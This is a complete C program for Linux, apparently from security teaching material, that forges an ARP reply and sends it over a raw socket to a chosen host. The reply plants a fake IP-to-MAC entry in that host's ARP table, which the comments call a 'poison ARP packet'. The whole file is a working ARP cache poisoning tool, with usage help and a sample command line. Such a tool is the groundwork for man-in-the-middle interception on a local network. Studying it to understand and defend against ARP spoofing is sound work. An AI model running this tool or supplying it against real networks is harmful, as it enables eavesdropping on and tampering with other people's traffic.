/*****************************************************************
 ARP Stuff
 Copyright 2005 N. Krawetz  All rights reserved.

 Purpose:
   Send a new ARP table entry to an arbitrary host.
   This stuffs the ARP table.

 Usage:
   arp_stuff <interface> <sender_ip> <sender_mac> <target_ip> <target_mac>
     This will send an arp packet to the target system.
     The data will set sender_ip to sender_mac on the target system.

 NOTE: This code is for Linux.
 To use raw sockets under BSD (including Mac OS X), refer to
 the Berkeley Packet Filter man page, BPF(4).
 *****************************************************************/

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>

/** Linux specific code **/
struct sockaddr_arp
  {
  short arp_family;
  short arp_protocol;
  int arp_ifindex;
  short arp_hatype;
  char arp_pkttype;
  char arp_halen;
  char arp_addr[8];
  };
typedef struct sockaddr_arp sockaddr_arp;

struct packet
  {
  struct ether_header ether_header;
  struct arphdr arp_header;
  /* ARP data */
  unsigned char arp_sha[ETHER_ADDR_LEN]; /* Sender hardware address */
  unsigned char arp_sip[4];        /* Sender IP address */
  unsigned char arp_tha[ETHER_ADDR_LEN]; /* Target hardware address */
  unsigned char arp_tip[4];        /* Target IP address */
  /* all above should be 42 bytes; need 60 bytes total */
  unsigned char Trailer[18];       /* Remainder of the packet */
  };
typedef struct packet packet;

/*********************************************************
 Text2Bin(): Convert a set of ASCII hex codes to binary.
 This skips over all non-hex codes.
 *********************************************************/
void	Text2Bin	(char *String, char *Binary, int MaxBinaryLen)
{
  int Blen,Slen;	/* indexes into String and Binary */
  int BitsFilled;	/* number of bits filled per byte */
  int Val;	/* value of String[Slen] converted to binary */

  Blen=0;
  Slen=0;
  BitsFilled=0;
  memset(Binary,0,MaxBinaryLen);

  while((Blen < MaxBinaryLen) && (String[Slen] != '\0'))
    {
    if (isxdigit(String[Slen]))
	{
	/* load the character */
	if (isdigit(String[Slen]))	Val = String[Slen] - '0';
	else if  (isupper(String[Slen]))	Val = String[Slen] - 'A' + 10;
	else	Val = String[Slen] - 'a' + 10;
	/* store the character */
	Binary[Blen] = Binary[Blen] * 0x10 + Val;
	BitsFilled += 4;
	if (BitsFilled > 7)
		{
		Blen++;
		BitsFilled=0;
		}
	}
    Slen++;
    }
} /* Text2Bin() */

/*********************************************************
 LoadInterface(): A computer may have multiple network cards.
 Load the interface for the desired card.
 This will be used for transmitting the poison ARP packet.
 NOTE: This function is Linux-specific.
 *********************************************************/
void	LoadInterface	(int Socket, char *InterfaceName,
			 sockaddr_arp *SocketData)
{
  struct ifreq Interface;

  memset(SocketData,0,sizeof(sockaddr_arp));
  SocketData->arp_protocol = htons(ETHERTYPE_ARP);
  SocketData->arp_halen    = ETHER_ADDR_LEN;

  strcpy(Interface.ifr_name,InterfaceName);

  if (ioctl(Socket,SIOCGIFINDEX,&Interface) < 0)
    {
    printf("Error obtaining interface %s index\n",Interface.ifr_name);
    exit(-1);
    }
  SocketData->arp_ifindex  = Interface.ifr_ifindex;

  if (ioctl(Socket,SIOCGIFADDR,&Interface) < 0)
    {
    printf("Error obtaining interface %s network address\n",Interface.ifr_name);
    exit(-1);
    }
  memcpy(SocketData->arp_addr,Interface.ifr_hwaddr.sa_data,ETHER_ADDR_LEN);
} /* LoadInterface() */

/*********************************************************
 Usage(): Display program usage.
 *********************************************************/
void	Usage	(char *Name)
{
  printf("Usage: %s <interface> <fake_ip> <fake_mac> <target_ip> <target_mac>\n",Name);
  printf("  This will send an arp packet to the target system.\n");
  printf("  If it is successful, it will set sender_ip to sender_mac.\n");
  printf("Sample usage:\n");
  printf("  %s eth0 1.2.3.4 11:22:33:44:55:66 9.9.9.9 aa:bb:cc:aa:bb:cc\n",Name);
  printf("  This will send to host 9.9.9.9 at aa:bb:cc:aa:bb:cc\n");
  printf("  an ARP table entry for 1.2.3.4 at 11:22:33:44:55:66\n");
  printf("  It will use the network interface 'eth0'.\n");
} /* Usage() */

/*********************************************************/
int	main	(int argc, char *argv[])
{
  packet Packet;
  sockaddr_arp SocketData;
  in_addr_t IPaddress;
  int Socket;
  int rc;

  /* check parameters */
  if (argc != 6) { Usage(argv[0]); exit(-1); }

  /* check user */
  if ((getuid() != 0) && (geteuid() != 0))
    {
    printf("ERROR: This program requires root access.\n");
    exit(-1);
    }

  /* load Ethernet header */
  memset(&Packet,0,sizeof(packet));
  Text2Bin(argv[3],Packet.ether_header.ether_shost,ETHER_ADDR_LEN);
  Text2Bin(argv[5],Packet.ether_header.ether_dhost,ETHER_ADDR_LEN);
  Packet.ether_header.ether_type = htons(ETHERTYPE_ARP);

  /* load ARP header */
  Packet.arp_header.ar_hrd = htons(ARPHRD_ETHER);
  Packet.arp_header.ar_pro = htons(0x0800);  /* 0x0800 = ethernet protocol */
  Packet.arp_header.ar_hln = ETHER_ADDR_LEN;
  Packet.arp_header.ar_pln = 4;
  Packet.arp_header.ar_op  = htons(ARPOP_REPLY);

  /* Load ARP data */
  /** store the fake source ARP and IP address **/
  Text2Bin(argv[3],Packet.arp_sha,6);
  IPaddress = ntohl(inet_addr(argv[2]));
  Packet.arp_sip[0] = (IPaddress & 0xff000000) >> 24;
  Packet.arp_sip[1] = (IPaddress & 0x00ff0000) >> 16;
  Packet.arp_sip[2] = (IPaddress & 0x0000ff00) >> 8;
  Packet.arp_sip[3] = (IPaddress & 0x000000ff) >> 0;
  /** set the real target ARP and IP address **/
  Text2Bin(argv[5],Packet.arp_tha,6);
  IPaddress = ntohl(inet_addr(argv[4]));
  Packet.arp_tip[0] = (IPaddress & 0xff000000) >> 24;
  Packet.arp_tip[1] = (IPaddress & 0x00ff0000) >> 16;
  Packet.arp_tip[2] = (IPaddress & 0x0000ff00) >> 8;
  Packet.arp_tip[3] = (IPaddress & 0x000000ff) >> 0;

  /* Now we have the packet ready.  Let's prepare a socket */

  /** Linux requires some ioctl calls to make raw sockets work **/
  Socket = socket(AF_PACKET,SOCK_RAW,htons(ETHERTYPE_ARP));
  if (Socket < 0)
    {
    printf("ERROR: Failed to open socket.\n");
    exit(-1);
    }
  /* Get the interface using a bunch of ioctl() calls. */
  LoadInterface(Socket,argv[1],&SocketData);

  /* Send data out of the socket.  sendto() does not require a connection */
  rc = sendto(Socket,&Packet,sizeof(Packet),0,
  	      (struct sockaddr *)(&SocketData),sizeof(SocketData));
  if (rc != sizeof(packet))
	{
	printf("Write failed -- wrote %d out of %d bytes.\n",rc,sizeof(packet));
	}

  close(Socket);
  return(0);
} /* main() */

